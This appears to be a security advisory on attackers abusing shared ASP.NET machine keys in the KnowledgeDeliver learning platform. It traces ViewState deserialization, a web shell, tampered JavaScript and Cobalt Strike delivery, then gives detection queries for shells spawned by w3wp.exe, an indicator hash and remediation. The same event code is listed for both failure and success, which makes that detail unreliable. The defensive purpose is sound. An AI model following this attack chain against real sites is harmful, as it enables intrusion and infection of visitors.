In late 2025, Mandiant addressed a serious security breach involving KnowledgeDeliver, a Learning Management System (LMS) developed by Digital Knowledge, widely used in Japan. This incident revealed a critical vulnerability that permitted unauthenticated Remote Code Execution (RCE), enabling an unknown threat actor to inject malicious code into the platform, targeting users visiting the site.
This vulnerability arose from the use of identical pre-shared ASP.NET machine keys across various customer deployments, which allowed attackers to exploit the system. Initially identified as a zero-day, this vulnerability is now tracked as CVE-2026-5426.
Understanding the Vulnerability
KnowledgeDeliver installations prior to February 24, 2026, utilized a standardized web.config file from the vendor. This file contained hardcoded machineKey values essential for the ASP.NET framework to encrypt and sign data, including ViewState payloads. The identical keys across different customer environments meant that a compromised key from one instance could potentially jeopardize others.
For instance, the configuration line in the web.config file looked like this:
ASP.NET ViewState maintains page state across postbacks. With access to the machineKey, an attacker could create a malicious ViewState payload and send it via an HTTP request using the __VIEWSTATE parameter, prompting the server to deserialize it.
Post-Exploitation Activities
After gaining access, the threat actors aimed to solidify their presence and broaden the impact of the breach.
Deployment of BLUEBEAM Web Shell
The attackers deployed a .NET-based in-memory web shell known as BLUEBEAM (or Godzilla), which operates entirely within the IIS worker process (w3wp.exe). This characteristic makes it challenging to detect through conventional file-based scanning methods. The malware enables further command execution and payload delivery via encrypted HTTP POST requests.
File Manipulation
The threat actor executed commands to enhance control over the web server's file system:
-
Permission Modification: The attacker used
icaclsto grant full access to the web application directory for all users. -
JavaScript Tampering: Modifications were made to an application JavaScript file to:
- Display a deceptive security alert urging users to install a "security authentication plugin".
- Load a malicious script from a remote domain without user knowledge.
Cobalt Strike Infection
The remote script tricked users into downloading a counterfeit installer, resulting in workstations being infected with a Cobalt Strike BEACON backdoor. The payload was encrypted with a key derived from the name of the compromised organization, indicating targeted preparation by the threat actor.
Monitoring for Exploitation
Organizations should be vigilant for the following indicators to detect potential ViewState exploitation and subsequent activities:
1. Application Event Logs (Event ID 1316)
Monitor the Windows Application log for Event ID 1316 from ASP.NET 4.0.30319.0 or similar:
- Failed Attempt: Event code: 4009 indicates a ViewState verification failure, suggesting an attack attempt.
- Successful Execution: Event code: 4009 may confirm that deserialization of the payload was attempted.
2. Suspicious Process Activity
Watch for unusual child processes spawned by w3wp.exe, including:
cmd.exe /c ...whoamipowershell.exe
3. File Integrity Monitoring
Look for unauthorized modifications to .js, .aspx, or .config files in the web root, particularly for remote script loaders or unusual logic.
4. Anomalous User-Agent Strings
Monitor web request logs for unusual User-Agent strings that may suggest exploitation attempts, such as:
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.2 ...Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Remediation Strategies
- Rotate Machine Keys: Generate unique, cryptographically strong machine keys for each KnowledgeDeliver instance to invalidate shared secrets.
- Restrict Access: Limit LMS access to known organizational IP ranges where possible.
- Conduct Investigations: Actively hunt for signs of exploitation and perform thorough investigations if any indicators are detected.
Conclusion
The exploitation of KnowledgeDeliver underscores the significant risks associated with using shared secrets in deployment templates. A single compromised key can jeopardize an entire ecosystem of installations. By employing unique secrets and robust monitoring, organizations can better defend against such deserialization attacks.
Indicators of Compromise (IOCs)
| File Name | Type | SHA-256 |
|---|---|---|
LoadLibrary.dll | BLUEBEAM | 7c1f99dca8e5a7897892f9d224a6495023a2cfd2671697d229d355978c415ed2 |
Security Operations (SecOps) Recommendations
Utilize the following SecOps searches to identify this activity:
(metadata.log_type = "WINEVTLOG" or metadata.log_type = "WINEVTLOG_XML") metadata.product_event_type = "1316" additional.fields["Message"] = /Event code: 4009\b/ nocase(metadata.event_type = "PROCESS_LAUNCH" or metadata.event_type = "PROCESS_OPEN") AND principal.process.command_line = /w3wp.exe/ nocase AND target.process.command_line = /cmd.+ \/c |whoami|powershell/ nocaseSecOps customers can access various rules under the Mandiant Hunting Rules for further insights.
